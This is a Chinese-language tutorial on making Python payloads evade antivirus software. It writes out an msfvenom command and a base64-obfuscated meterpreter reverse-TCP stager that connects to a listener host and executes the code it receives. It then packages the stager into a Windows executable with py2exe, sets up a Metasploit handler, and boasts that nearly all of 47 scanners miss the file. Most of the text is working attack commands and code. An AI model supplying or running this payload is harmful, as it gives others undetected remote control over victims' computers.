很多滲透工具都提供了權限維持的能力,如Metasploit、Empire和Cobalt Strike,但是都會被防病毒軟件檢測到這種惡意行為。在探討一個權限維持技巧的時候,似乎越來越多的人關注的是,這個方式會不會被被殺軟殺掉?
打造免殺的payload成了一個很重要的話題,在這里,本文將介紹如何使用Pyhton輕松繞過防病毒軟件。
0x01 環境准備
1、軟件安裝
Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
2、msfvenom生成Python Payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py
evil.py 代碼如下:
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))
0x02 py2exe 打包Python程序
將evil.py復制到windows,同時創建一個setup.py文件:
from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)
下面的方法運行 evil.py,生成可執行文件。
python ./setup.py py2exe
0x03 設置監聽端口
Kali 運行Metasploit,設置監聽:
msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run
在Windows中運行evil.exe,獲得一個meterpreter的會話
0x04 免殺驗證
確認生成的exe文件可正常工作,接下來對evil.exe進行在線病毒掃描,以確認免殺效果如何。
這里我們使用VirSCAN.org-多引擎在線病毒掃描網 v1.02,當前支持 47 款殺毒引擎
掃描結果:47款殺毒引擎中,只有一個引擎報毒,主流的殺毒軟件全部繞過。
網站地址:http://www.virscan.org
參考文章:
https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1